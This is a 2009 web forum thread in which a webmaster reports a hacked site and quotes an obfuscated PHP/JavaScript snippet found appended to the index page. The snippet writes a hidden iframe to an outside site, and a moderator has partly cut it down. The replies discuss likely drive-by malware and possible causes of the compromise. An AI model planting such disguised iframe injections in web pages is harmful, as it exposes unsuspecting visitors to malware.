homepage Welcome to WebmasterWorld Guest from 54.205.207.53
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Pubcon Platinum Sponsor 2014
Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
Forum Library, Charter, Moderators: coopster & jatar k

PHP Server Side Scripting Forum

    
I think my friend's website got hacked?
Walley

5+ Year Member



 
Msg#: 3961891 posted 5:41 pm on Jul 29, 2009 (gmt 0)

I help made a website for a friend a while ago and recently went to visit it.
File permission: 604

If so how do I prevent this? The site has no textarea or inputs.

I noticed this error when opening the website:
Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';'

I then downloaded the file and found the below at the bottom of my index page.


<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+" "ra"+"m"+"e>");</script>'; ?>

[edited by: jatar_k at 2:21 pm (utc) on July 30, 2009]
[edit reason] reduced malicious code [/edit]

 

StoutFiles

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3961891 posted 8:29 pm on Jul 29, 2009 (gmt 0)

Looks like you're iframing some .cn sites. Obviously I'm not going to go to them but they may try to install software upon loading, which would be a big problem since they're iframed so small that it would appear as if you were giving out viruses.

Walley

5+ Year Member



 
Msg#: 3961891 posted 11:43 pm on Jul 29, 2009 (gmt 0)

How was this possible? Looks like they got a hold of the index file and some how wrote that into it. There are no textareas or inputs on the site.

eeek

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3961891 posted 4:53 am on Jul 30, 2009 (gmt 0)

How was this possible?

Bugs in a script you are running and permissions that allow the server to write over the content would be my guess.

dreamcatcher

WebmasterWorld Senior Member dreamcatcher us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3961891 posted 3:29 pm on Jul 30, 2009 (gmt 0)

Are you on a shared server? Maybe another site got hacked on the server and it affected all sites on the server.

dc

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved